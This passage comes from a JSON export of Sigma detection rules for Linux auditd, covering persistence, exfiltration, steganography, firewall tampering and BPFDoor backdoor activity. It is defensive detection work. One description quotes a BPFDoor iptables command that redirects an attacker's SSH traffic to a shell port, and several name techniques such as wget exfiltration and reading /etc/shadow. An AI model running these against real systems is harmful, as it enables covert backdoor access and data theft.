], "filename": "lnx_auditd_systemd_service_creation.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_systemd_service_creation.yml" ], "tags": [ "attack.persistence", "attack.t1543.002" ] }, "related": [ { "dest-uuid": "dfefe2ed-4389-4318-8762-f0272b350a1b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1bac86ba-41aa-4f62-9d6b-405eac99b485", "value": "Systemd Service Creation" }, { "description": "Detects command line parameter very often used with coin miners", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-10-09", "falsepositive": [ "Other tools that use a --cpu-priority flag" ], "filename": "lnx_auditd_coinminer.yml", "level": "critical", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://xmrig.com/docs/miner/command-line-options", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_coinminer.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1068" ] }, "related": [ { "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "071d5e5a-9cef-47ec-bc4e-a42e34d8d0ed", "value": "Possible Coin Miner CPU Priority Param" }, { "description": "Detects attempts to collect image data stored in the clipboard from users with the usage of xclip tool.\nXclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", "meta": { "author": "Pawel Mazur", "creation_date": "2021-10-01", "falsepositive": [ "Legitimate usage of xclip tools" ], "filename": 
"lnx_auditd_clipboard_image_collection.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://linux.die.net/man/1/xclip", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml" ], "tags": [ "attack.collection", "attack.t1115" ] }, "related": [ { "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f200dc3f-b219-425d-a17e-c38467364816", "value": "Clipboard Collection of Image Data with Xclip Tool" }, { "description": "Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes.", "meta": { "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", "creation_date": "2019-10-24", "falsepositive": [ "Unknown" ], "filename": "lnx_auditd_ld_so_preload_mod.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md", "https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_ld_so_preload_mod.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.006" ] }, "related": [ { "dest-uuid": "633a100c-b2c9-41bf-9be5-905c1b16c825", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4b3cb710-5e83-4715-8c45-8b2b5b3e5751", "value": "Modification of ld.so.preload" }, { "description": "Detects extraction of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.", "meta": { "author": "Pawel Mazur", "creation_date": "2021-09-11", 
"falsepositive": [ "Unknown" ], "filename": "lnx_auditd_steghide_extract_steganography.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027.003" ] }, "related": [ { "dest-uuid": "c2e147a9-d1a8-4074-811a-d8789202d916", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a5a827d9-1bbe-4952-9293-c59d897eb41b", "value": "Steganography Extract Files with Steghide" }, { "description": "All TCP traffic on particular port from attacker is routed to different port. ex. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392'\nThe traffic looks like encrypted SSH communications going to TCP port 22, but in reality is being directed to the shell port once it hits the iptables rule for the attacker host only.\n", "meta": { "author": "Rafal Piasecki", "creation_date": "2022-08-10", "falsepositive": [ "Legitimate ports redirect" ], "filename": "lnx_auditd_bpfdoor_port_redirect.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor", "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_port_redirect.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "70b4156e-50fc-4523-aa50-c9dddf1993fc", "value": "Bpfdoor TCP Ports Redirect" }, { 
"description": "Detects embedding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.", "meta": { "author": "Pawel Mazur", "creation_date": "2021-09-11", "falsepositive": [ "Unknown" ], "filename": "lnx_auditd_steghide_embed_steganography.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027.003" ] }, "related": [ { "dest-uuid": "c2e147a9-d1a8-4074-811a-d8789202d916", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ce446a9e-30b9-4483-8e38-d2c9ad0a2280", "value": "Steganography Hide Files with Steghide" }, { "description": "Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network.", "meta": { "author": "Pawel Mazur", "creation_date": "2022-01-22", "falsepositive": [ "Admin activity" ], "filename": "lnx_auditd_disable_system_firewall.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://firewalld.org/documentation/man-pages/firewall-cmd.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_disable_system_firewall.yml" ], "tags": [ "attack.t1562.004", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "53059bc0-1472-438b-956a-7508a94a91f0", "value": "Disable System Firewall" }, { 
"description": "Detects adversary creating screen capture of a full with xwd. Highly recommended using rule on servers, due high usage of screenshot utilities on user workstations", "meta": { "author": "Pawel Mazur", "creation_date": "2021-09-13", "falsepositive": [ "Legitimate use of screenshot utility" ], "filename": "lnx_auditd_screencaputre_xwd.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://linux.die.net/man/1/xwd", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-3---x-windows-capture", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml" ], "tags": [ "attack.collection", "attack.t1113" ] }, "related": [ { "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e2f17c5d-b02a-442b-9052-6eb89c9fec9c", "value": "Screen Capture with Xwd" }, { "description": "detects BPFDoor .lock and .pid files access in temporary file storage facility", "meta": { "author": "Rafal Piasecki", "creation_date": "2022-08-10", "falsepositive": [ "Unlikely" ], "filename": "lnx_auditd_bpfdoor_file_accessed.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor", "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_file_accessed.yml" ], "tags": [ "attack.execution", "attack.t1106", "attack.t1059" ] }, "related": [ { "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "808146b2-9332-4d78-9416-d7e47012d83d", "value": "BPFDoor Abnormal Process ID or Lock File Accessed" }, { "description": "Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool.\nXclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", "meta": { "author": "Pawel Mazur", "creation_date": "2021-09-24", "falsepositive": [ "Legitimate usage of xclip tools" ], "filename": "lnx_auditd_clipboard_collection.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://linux.die.net/man/1/xclip", "https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_clipboard_collection.yml" ], "tags": [ "attack.collection", "attack.t1115" ] }, "related": [ { "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "214e7e6c-f21b-47ff-bb6f-551b2d143fcf", "value": "Clipboard Collection with Xclip Tool - Auditd" }, { "description": "Detects attempts to post the file with the usage of wget utility.\nThe adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow.\n", "meta": { "author": "Pawel Mazur", "creation_date": "2021-11-18", "falsepositive": [ "Legitimate usage of wget utility to post a file" ], "filename": "lnx_auditd_data_exfil_wget.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://linux.die.net/man/1/wget", "https://gtfobins.github.io/gtfobins/wget/", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml" ], "tags": [ "attack.exfiltration", "attack.t1048.003" ] }, "related": [ { "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cb39d16b-b3b6-4a7a-8222-1cf24b686ffc", "value": "Data Exfiltration with Wget" }, { "description": "Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2019-10-21", "falsepositive": [ "Admin activity" ], "filename": "lnx_auditd_user_discovery.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_user_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1033" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9a0d8ca0-2385-4020-b6c6-cb6153ca56f3", "value": "System Owner or User Discovery" }, { "description": "Detects relevant commands often related to malware or hacking activity", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-12-12", "falsepositive": [ "Admin activity" ], "filename": "lnx_auditd_susp_cmds.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "Internal Research - mostly derived from exploit code including code in MSF", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_cmds.yml" ], "tags": [ "attack.execution", "attack.t1059.004" ] }, "related": [ { "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1543ae20-cbdf-4ec1-8d12-7664d667a825", "value": "Suspicious Commands Linux" }, { "description": "Detects attempts to record audio with arecord utility", "meta": { "author": "Pawel Mazur", "creation_date": "2021-09-04", "falsepositive": [ "Unknown" ], "filename": "lnx_auditd_audio_capture.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://linuxconfig.org/how-to-test-microphone-with-audio-linux-sound-architecture-alsa", "https://linux.die.net/man/1/arecord", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_audio_capture.yml" ], "tags": [ "attack.collection", "attack.t1123" ] }, "related": [ { "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a7af2487-9c2f-42e4-9bb9-ff961f0561d5", "value": "Audio Capture" }, { "description": "Detects password policy discovery commands", "meta": { "author": "Ömer Günal, oscd.community, Pawel Mazur", "creation_date": "2020-10-08", "falsepositive": [ "Legitimate administration activities" ], "filename": "lnx_auditd_password_policy_discovery.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://linux.die.net/man/1/chage", "https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md", "https://man7.org/linux/man-pages/man1/passwd.1.html", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1201" ] }, "related": [ { "dest-uuid": "b6075259-dba3-44e9-87c7-e954f37ec0d5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ca94a6db-8106-4737-9ed2-3e3bb826af0a", "value": "Password Policy Discovery" }, { "description": "Detects extracting of zip file from image file", "meta": { "author": "Pawel Mazur", "creation_date": "2021-09-09", "falsepositive": [ "Unknown" ], "filename": "lnx_auditd_unzip_hidden_zip_files_steganography.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027.003" ] }, "related": [ { "dest-uuid": "c2e147a9-d1a8-4074-811a-d8789202d916", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "edd595d7-7895-4fa7-acb3-85a18a8772ca", "value": "Steganography Unzip Hidden Information From Picture File" }, { "description": "Detects appending of zip file to image", "meta": { "author": "Pawel Mazur", "creation_date": "2021-09-09", "falsepositive": [ "Unknown" ], "filename": "lnx_auditd_hidden_zip_files_steganography.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027.003" ] }, "related": [ { "dest-uuid": "c2e147a9-d1a8-4074-811a-d8789202d916", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "45810b50-7edc-42ca-813b-bdac02fb946b", "value": "Steganography Hide Zip Information in Picture File" }, { "description": "Detects the removal of system firewall rules. Adversaries may only delete or modify a specific system firewall rule to bypass controls limiting network usage or access.\nDetection rules that match only on the disabling of firewalls will miss this.\n", "meta": { "author": "IAI", "creation_date": "2023-03-06", "falsepositive": [ "Legitimate admin activity" ], "filename": "lnx_auditd_modify_system_firewall.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html", "https://blog.aquasec.com/container-security-tnt-container-attack", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_modify_system_firewall.yml" ], "tags": [ "attack.t1562.004", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "323ff3f5-0013-4847-bbd4-250b5edb62cc", "value": "Modify System Firewall" }, { "description": "Detects adversary creating screen capture of a desktop with Import Tool.\nHighly recommended using rule on servers, due to high usage of screenshot utilities on user workstations.\nImageMagick must be installed.\n", "meta": { "author": "Pawel Mazur", "creation_date": "2021-09-21", "falsepositive": [ "Legitimate use of screenshot utility" ], "filename": "lnx_auditd_screencapture_import.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md", "https://imagemagick.org/", 
"https://linux.die.net/man/1/import", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencapture_import.yml" ], "tags": [ "attack.collection", "attack.t1113" ] }, "related": [ { "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dbe4b9c5-c254-4258-9688-d6af0b7967fd", "value": "Screen Capture with Import Tool" }, { "description": "Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.", "meta": { "author": "Marie Euler, Pawel Mazur", "creation_date": "2020-05-18", "falsepositive": [ "Admin activity" ], "filename": "lnx_auditd_create_account.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-understanding_audit_log_files", "https://www.youtube.com/watch?v=VmvY5SQm5-Y&ab_channel=M45C07", "https://access.redhat.com/articles/4409591#audit-record-types-2", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_create_account.yml" ], "tags": [ "attack.t1136.001", "attack.persistence" ] }, "related": [ { "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "759d0d51-bc99-4b5e-9add-8f5b2c8e7512", "value": "Creation Of An User Account" }, { "description": "Detects a reload or a start of a service.", "meta": { "author": "Jakob Weinzettl, oscd.community", "creation_date": "2019-09-23", "falsepositive": [ "Installation of legitimate service.", "Legitimate reconfiguration of service." 
], "filename": "lnx_auditd_pers_systemd_reload.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_pers_systemd_reload.yml" ], "tags": [ "attack.persistence", "attack.t1543.002" ] }, "related": [ { "dest-uuid": "dfefe2ed-4389-4318-8762-f0272b350a1b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2625cc59-0634-40d0-821e-cb67382a3dd7", "value": "Systemd Service Reload or Start" }, { "description": "Detects Unix shell configuration modification. Adversaries may establish persistence through executing malicious commands triggered when a new shell is opened.", "meta": { "author": "Peter Matkovski, IAI", "creation_date": "2023-03-06", "falsepositive": [ "Admin or user activity is expected to generate some false positives" ], "filename": "lnx_auditd_unix_shell_configuration_modification.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://objective-see.org/blog/blog_0x68.html", "https://web.archive.org/web/20221204161143/https://www.glitch-cat.com/p/green-lambert-and-attack", "https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_unix_shell_configuration_modification.yml" ], "tags": [ "attack.persistence", "attack.t1546.004" ] }, "related": [ { "dest-uuid": "b63a34e8-0a61-4c97-a23b-bf8a2ed812e2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a94cdd87-6c54-4678-a6cc-2814ffe5a13d", "value": "Unix Shell Configuration Modification" }, { "description": "Detects attempts to extract passwords with grep", "meta": { 
"author": "Igor Fits, oscd.community", "creation_date": "2020-10-15", "falsepositive": [ "Unknown" ], "filename": "lnx_auditd_find_cred_in_files.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_find_cred_in_files.yml" ], "tags": [ "attack.credential-access", "attack.t1552.001" ] }, "related": [ { "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "df3fcaea-2715-4214-99c5-0056ea59eb35", "value": "Credentials In Files - Linux" }, { "description": "Detects enumeration of local or remote network services.", "meta": { "author": "Alejandro Ortuno, oscd.community", "creation_date": "2020-10-21", "falsepositive": [ "Legitimate administration activities" ], "filename": "lnx_auditd_network_service_scanning.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_network_service_scanning.yml" ], "tags": [ "attack.discovery", "attack.t1046" ] }, "related": [ { "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3761e026-f259-44e6-8826-719ed8079408", "value": "Linux Network Service Scanning - Auditd" }, { "description": "Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation.\nSeveral different variations of this technique have been 
observed.\n", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2019-10-21", "falsepositive": "No established falsepositives", "filename": "lnx_auditd_masquerading_crond.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/8a82e9b66a5b4f4bc5b91089e9f24e0544f20ad7/atomics/T1036.003/T1036.003.md#atomic-test-2---masquerading-as-linux-crond-process", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_masquerading_crond.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9d4548fa-bba0-4e88-bd66-5d5bf516cda0", "value": "Masquerading as Linux Crond Process" }, { "description": "Detects adversary creating hidden file or directory, by detecting directories or files with . 
as the first character", "meta": { "author": "Pawel Mazur", "creation_date": "2021-09-06", "falsepositive": [ "Unknown" ], "filename": "lnx_auditd_hidden_files_directories.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.001" ] }, "related": [ { "dest-uuid": "ec8fc7e2-b356-455c-8db5-2e37be158e7d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d08722cd-3d09-449a-80b4-83ea2d9d4616", "value": "Hidden Files and Directories" }, { "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.", "meta": { "author": "Igor Fits, oscd.community", "creation_date": "2020-10-15", "falsepositive": [ "Legitimate administrative activity" ], "filename": "lnx_auditd_system_shutdown_reboot.yml", "level": "informational", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_shutdown_reboot.yml" ], "tags": [ "attack.impact", "attack.t1529" ] }, "related": [ { "dest-uuid": "ff73aa03-0090-4464-83ac-f89e233c02bc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4cb57c2f-1f29-41f8-893d-8bed8e1c1d2f", "value": "System Shutdown/Reboot - Linux" }, { "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent 
over the network.", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2019-10-21", "falsepositive": [ "Legitimate use of archiving tools by legitimate user." ], "filename": "lnx_auditd_data_compressed.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/a78b9ed805ab9ea2e422e1aa7741e9407d82d7b1/atomics/T1560.001/T1560.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_data_compressed.yml" ], "tags": [ "attack.exfiltration", "attack.t1560.001" ] }, "related": [ { "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a3b5e3e9-1b49-4119-8b8e-0344a01f21ee", "value": "Data Compressed" }, { "description": "Detects System Information Discovery commands", "meta": { "author": "Pawel Mazur", "creation_date": "2021-09-03", "falsepositive": [ "Likely" ], "filename": "lnx_auditd_system_info_discovery.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f296668303c29d3f4c07e42bdd2b28d8dd6625f9/atomics/T1082/T1082.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_info_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1082" ] }, "related": [ { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f34047d9-20d3-4e8b-8672-0a35cc50dc71", "value": "System Information Discovery - Auditd" }, { "description": "Detects removing immutable file attribute.", "meta": { "author": "Jakob Weinzettl, oscd.community", "creation_date": "2019-09-23", "falsepositive": [ "Administrator interacting with immutable files (e.g. for instance backups)." 
], "filename": "lnx_auditd_chattr_immutable_removal.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_chattr_immutable_removal.yml" ], "tags": [ "attack.defense-evasion", "attack.t1222.002" ] }, "related": [ { "dest-uuid": "09b130a2-a77e-4af0-a361-f46f9aad1345", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a5b977d6-8a81-4475-91b9-49dbfcd941f7", "value": "Remove Immutable File Attribute - Auditd" }, { "description": "Detects file and folder permission changes.", "meta": { "author": "Jakob Weinzettl, oscd.community", "creation_date": "2019-09-23", "falsepositive": [ "User interacting with files permissions (normal/daily behaviour)." ], "filename": "lnx_auditd_file_or_folder_permissions.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_file_or_folder_permissions.yml" ], "tags": [ "attack.defense-evasion", "attack.t1222.002" ] }, "related": [ { "dest-uuid": "09b130a2-a77e-4af0-a361-f46f9aad1345", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "74c01ace-0152-4094-8ae2-6fd776dd43e5", "value": "File or Folder Permissions Change" }, { "description": "Detect changes of syslog daemons configuration files", "meta": { "author": "Mikhail Larin, oscd.community", "creation_date": "2019-10-25", "falsepositive": [ "Legitimate administrative activity" ], "filename": "lnx_auditd_logging_config_change.yml", "level": "high", 
